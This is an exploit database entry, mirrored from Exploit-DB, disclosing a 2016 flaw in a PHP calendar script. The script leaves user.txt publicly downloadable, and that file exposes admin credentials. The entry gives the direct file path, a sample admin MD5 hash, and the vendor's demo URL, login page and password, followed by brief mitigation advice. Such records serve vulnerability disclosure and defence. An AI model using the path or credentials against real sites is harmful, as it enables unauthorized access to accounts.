header-logo
Suggest Exploit
vendor:
PHP calendar script
by:
Meisam Monsef
7.5
CVSS
HIGH
Password disclosure
200
CWE
Product Name: PHP calendar script
Affected Version From: All versions
Affected Version To: All versions
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2016

PHP calendar script Password Download File

The PHP calendar script allows an attacker to download the user.txt file containing sensitive information like admin credentials. The file can be accessed directly through the exploit link provided.

Mitigation:

The vendor should implement proper access controls and ensure that sensitive files are not accessible by unauthorized users. Regular security assessments and patching should be performed.
Source

Exploit-DB raw data:

# Exploit Title: PHP calendar script Password Download File
# Date: 2016-07-18
# Exploit Author: Meisam Monsef meisamrce@yahoo.com or meisamrce@gmail.com
# Vendor Homepage: http://www.newsp.eu/calendarscript.php?pt=st
# Version: All Version
# Download Link : http://www.newsp.eu/calendar.zip

Exploit :
http://site/user.txt
Admin|fe01ce2a7fbac8fafaed7c982a04e229
Password Hash = fe01ce2a7fbac8fafaed7c982a04e229 (demo)[MD5]

Test :
Exploit : http://www.newsp.eu/demo/user.txt
Login Url : http://www.newsp.eu/demo/login.php
Password : demo

Navigation

Suggest Exploit

Services By CQR